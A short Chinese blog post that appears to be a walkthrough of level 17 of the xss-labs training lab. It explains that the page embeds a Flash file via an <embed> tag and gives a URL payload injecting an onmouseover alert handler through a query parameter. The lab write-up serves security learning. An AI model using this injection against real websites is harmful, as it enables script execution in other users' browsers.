Level-17:事件触发
(0)


来到 17 关可以看到:

先查看下网页源码:

可以看到 <embed> 标签, 标签定义嵌入的内容,比如插件。这里嵌入了 swf 格式也就是 flash 专用格式。这里直接插入事件即可。
http://www.kali.com/xss-labs/level17.php?arg01=a&arg02= onmouseover=alert(/xss/)

本文为作者HD_More发布,未经允许禁止转载!
上一篇 下一篇
评论
暂无评论 >_<
加入评论